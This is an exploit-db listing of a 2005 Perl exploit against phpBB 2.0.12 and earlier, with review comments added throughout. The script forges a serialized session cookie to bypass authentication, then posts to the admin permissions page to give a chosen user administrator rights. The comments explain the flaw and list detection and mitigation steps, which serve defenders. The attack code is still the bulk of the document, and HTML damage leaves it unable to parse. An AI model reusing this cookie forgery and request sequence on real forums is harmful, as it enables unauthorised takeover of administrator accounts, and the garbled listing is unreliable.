phpBB <= 2.0.12 Change User Rights Authentication Bypass

Type exploitdb
Reporter Kutas
Modified 2005-03-21T00:00:00


                                            #!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit
# This script uses the vulnerability in the autologinid variable
# More:
# Just gives a user on a vulnerable forum administrator rights.
# You should register the user before using this ;-)
#   by Kutas,
#P.S. I don't know who made the original exploit, so I cannot place a (c) here...
# but greets go to Paisterist, who made an exploit for Firefox cookies...

# NOTE(review): this listing is damaged by HTML extraction. Operators appear
# as entities (&lt;, &gt;), the usage string and several braces are never
# closed, and both post() calls show only form fields with no closing
# parenthesis, so the file does not parse as shown. The notes below describe
# what the visible lines do and what a defender can take from them.
#
# Argument check: fewer than three command-line arguments leads to the usage
# text (site, phpBB folder, username, optional proxy).
if (@ARGV &lt; 3)
 print q(
 Usage: perl [site] [phpbb folder] [username] [proxy (optional)] 
 i.e. perl /forum/ BigAdmin
# strict is enabled only from this point on; the lines above run with -w alone.
use strict;
use LWP::UserAgent;

# Positional arguments are used unvalidated. The base URL is always built
# with the plain "http://" scheme followed by host and forum path.
my $host  = $ARGV[0];
my $path  = $ARGV[1];
my $user  = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path; 

# The whole technique is the hand-crafted session cookie set below.
# URL-decoded, its value is a PHP-serialized array:
#   a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}
# so "autologinid" is the boolean true (b:1) instead of a string, and
# "userid" is the string "2".
# NOTE(review): presumably the affected phpBB releases unserialize this
# client-supplied cookie and compare autologinid to the stored value with a
# loose (==) comparison, which a boolean true satisfies for any non-empty
# string -- confirm against the session code of the affected version.
# NOTE(review): userid 2 is presumably the account created at install time,
# typically the board administrator -- confirm for the board in question.
# Detection: a phpbb2mysql_data cookie whose autologinid field is encoded as
# b%3A1 is not something a normal browser session produces, so it is a
# high-signal pattern for request logs and WAF rules.
# Mitigation: the title lists releases up to 2.0.12 as affected, so run a
# later release; in general, compare credentials with type-strict operators
# and do not unserialize data the client controls.
use HTTP::Cookies;
my $browser = LWP::UserAgent-&gt;new ();
my $cookie_jar = HTTP::Cookies-&gt;new( );
$browser-&gt;cookie_jar( $cookie_jar );
$cookie_jar-&gt;set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
# Optional proxy: a leading "http://" is stripped from the argument and the
# result is installed as the HTTP proxy. The /e flag on the substitution
# evaluates the (empty) replacement as code and is not needed here.
# The closing brace of this if-block is missing from the listing.
if ( defined $proxy) {
	$proxy =~ s/(http:\/\/)//eg;
	$browser-&gt;proxy("http" , "http://$proxy");
 print "++++++++++++++++++++++++++++++++++++\n";
 print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

# First request: GET the forum base URL with the forged cookie attached and
# abort on any non-success HTTP status.
my $response = $browser-&gt;get($request);
die "Error: ", $response-&gt;status_line
 unless $response-&gt;is_success;
# The literal "phpbbprivmsg" in the returned page is used as the success
# marker. NOTE(review): presumably that string is only rendered for a
# logged-in session -- treat the check as a heuristic, not proof.
if($response-&gt;content =~ m/phpbbprivmsg/) {
  print "\n   Forum is vulnerable!!!\n";
} else {
  print "Sorry... Not vulnerable"; exit();}

# The session id is scraped from the first "sid=" occurrence in the page.
# The match result is not checked, so $sid is whatever $1 holds if no
# "sid=" is present.
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response-&gt;content =~ /sid=([\w\d]*)/;
my $sid = $1;

# Second request: the admin permissions page (admin/admin_ug_auth.php) is
# addressed with the scraped sid and a user lookup form is submitted.
# The 'mode' key is given twice ('edit', then 'user').
# Detection: requests to admin/admin_ug_auth.php from a session that never
# passed the login form are a useful log artifact for incident review.
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser-&gt;post(
    'username'  =&gt; $user,
    'mode' =&gt; 'edit',
    'mode' =&gt; 'user',
    'submituser' =&gt; 'Look+up+User'
die "Error: ", $response-&gt;status_line
 unless $response-&gt;is_success;

# The numeric user id is read from the hidden form field name="u" in the
# lookup response; the script exits if that field is absent.
if ($response-&gt;content =~ /name="u" value="([\d]*)"/) 
	{print "   Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
   else {print "No user $user found..."; exit(); }	
my $uid = $1;
print "Trying to give user:$user admin status...\n";

# Third request: a form with userlevel=admin is submitted for the id found
# above. Only the HTTP status is checked; the script never verifies that the
# privilege change took effect, so the final message is optimistic.
# Incident response: upgrading does not revert changes already made this
# way, so audit the user table for unexpected administrator-level accounts
# on any board that ran an affected release.
$response = $browser-&gt;post(
    'userlevel'  =&gt; 'admin',
    'mode' =&gt; 'user',
    'u'=&gt; $uid,
    'submit'=&gt; 'Submit'
die "Error: ", $response-&gt;status_line
 unless $response-&gt;is_success;
print "   Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

# [2005-03-21]